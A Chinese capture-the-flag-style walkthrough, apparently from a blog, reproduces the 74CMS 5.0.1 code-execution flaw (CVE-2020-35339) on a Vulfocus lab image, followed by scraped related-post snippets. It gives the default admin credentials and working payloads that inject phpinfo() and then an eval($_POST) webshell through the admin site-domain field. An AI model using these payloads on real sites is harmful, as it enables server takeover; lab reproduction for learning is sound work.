本文章仅供学习使用,如用作非法用途,概不负责

0x01 漏洞介绍

骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的“平台+插件”体系,打造用户“DIY”个性化功能定制,为众多地方门户、行业人才提供一个专业、稳定、方便的网络招聘管理平台,致力发展成为引领市场风向的优质高效的招聘软件。

影响版本:74CMS 5.0.1

0x02 靶场地址

http://vulfocus.io/#/dashboard?image_id=cd8de842-58fc-4d89-9764-edf9f8e0eb81
名称:vulfocus/74cms_cve_2020_35339:latest
在这里插入图片描述

0x03 复现

  1. 启动并访问给出的靶场地址

    在url后面加上:/index.php?m=Admin 访问后台,账号密码均为:adminadmin
  2. 进入后台后,点击:系统——网站配置——在网站域名中填写下面数据使页面返回phpinfo
http://127.0.0.1/.',phpinfo(),'/.com


然后保存,保存后刷新当前页面,phpinfo页面便映入眼帘。


此时再进行登录,登录成功后,只会显示更详细的phpinfo界面,没有其他内容,建议不要随便使用。
然后修改一下代码,便可以直接getshell

getshell

原环境不能正常使用,只能重启环境继续下面的操作。
依旧是上面的步骤,不过代码换成:

http://127.0.0.1/.',eval($_POST[a]),'/.com


然后保存,刷新当前页面

然后直接上蚁剑连接

获得flag

0x04 修复建议

哎,升级版本吧

参考(实现原理):https://blog.csdn.net/qq_41252520/article/details/113850389

骑士cms任意代码执行(CVE-2020-35339)相关推荐

  1. 骑士cms任意代码执行

    漏洞描述: 迅易科技 74cms是中国迅易科技公司的一套基于PHP和MySQL的在线招聘系统. 74cms version 5.0.1 存在安全漏洞,该漏洞源于应用管理控制器ConfigControl ...

  2. vulfocus——骑士cms任意代码执行(CVE-2020-35339)

    描述 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统. 后台账号密码均为adminadmin 复现 1.打开web页面 2.找到后台登陆界面 ip:port/i ...

  3. 记一次海洋cms任意代码执行漏洞拿shell(url一句话)

    实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...

  4. php里pluck,Pluck CMS后台另两处任意代码执行

    前言 本来是在cnvd上看到了有人发Pluck CMS的洞,但是没有公开细节,便想着自己挖一下. 但是审完第一个后发现已经有两位同学写出来了 当时自己的思路跟第一个同学一样,第二个同学的思路自己确实没 ...

  5. 74cms 任意代码执行(CVE-2020-35339)

    74cms 任意代码执行(CVE-2020-35339) 0x01 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统.由太原迅易科技有限公司于2009年 ...

  6. Android Adobe Reader 任意代码执行分析(附POC)

    livers · 2014/04/18 14:05 0x00 描述 前几天老外在fd还有exploit-db上,公布了Adobe Reader任意代码执行的漏洞. 漏洞编号: CVE: 2014-05 ...

  7. HP officejet、PageWide打印机任意代码执行漏洞cve-2017-2741 Tenable发布漏洞检测插件...

    打印机无处不在.在企业,在家里,在学校,但你在做网络安全评估的时候是否考虑过他们?你上一次更新打印机固件是什么时候?您是否知道您的打印机有公共漏洞?Tenable安全公司进行了研究,并发布了漏洞检测  ...

  8. php 168任意代码执行漏洞之php的Complex (curly) syntax

    今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php ?only=1 &show ...

  9. Apple任意代码执行漏洞

    报告编号:B6-2021-072701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-27 0x01 漏洞简述 2021年07月27日,360CERT监测发现Apple ...

最新文章

  1. Nginx research, nginx module development
  2. P3805 【模板】manacher 算法【马拉车】
  3. python中的装饰器(以及多个装饰器详细执行过程)
  4. html 请求体 响应体,Http协议抓包详解
  5. BZOJ1787 Meet紧急集合
  6. js中addEventListener第三个参数涉及到的事件捕获与冒泡
  7. ios 现有项目接入Flutter (问题集中营--少走弯路)
  8. 笔记本安装PCMCIA并口卡
  9. 无线通信网络学习笔记-1
  10. 手机忘记开机密码怎么办?我来教你
  11. python爬虫爬取链家二手房信息
  12. [转]英文自我介绍范文
  13. Linux系统的历史发展演绎
  14. 汤姆斯的天堂梦(par)
  15. GitHub上不错的Android开源项目(三)
  16. 咦,我和名画撞脸了!
  17. 3个5相乘列乘法算式_6的乘法口诀教学设计范文
  18. 程序打包后需要设置管理员权限才可运行的解决办法
  19. Winsock LSP劫持导致无法上网
  20. 【Android UI】Paint Gradient 渐变渲染 ① ( LinearGradient 线性渐变渲染 | 设置渲染方向 | 设置渲染颜色 | 设置渲染模式 | MIRROR )

热门文章

  1. 小米路由修改服务器密码,192.168.31.1小米路由器修改WIFI密码
  2. selenium爬取亚马逊商品评论
  3. 大学生充实自己生活的方法
  4. Rust图片类型识别
  5. eclipse怎么配置oracle数据库,Eclipse连接Oracle数据库介绍
  6. Maven:A cycle was detected in the build path of project 'xxx'. The cycle consists of projects {xx}
  7. 操作系统复习题最全(复习看它就够了!!!!!
  8. 神经网络机器翻译技术及应用(上)
  9. Ubuntu18.04风扇狂转的解决办法
  10. 微信小程序学习日记6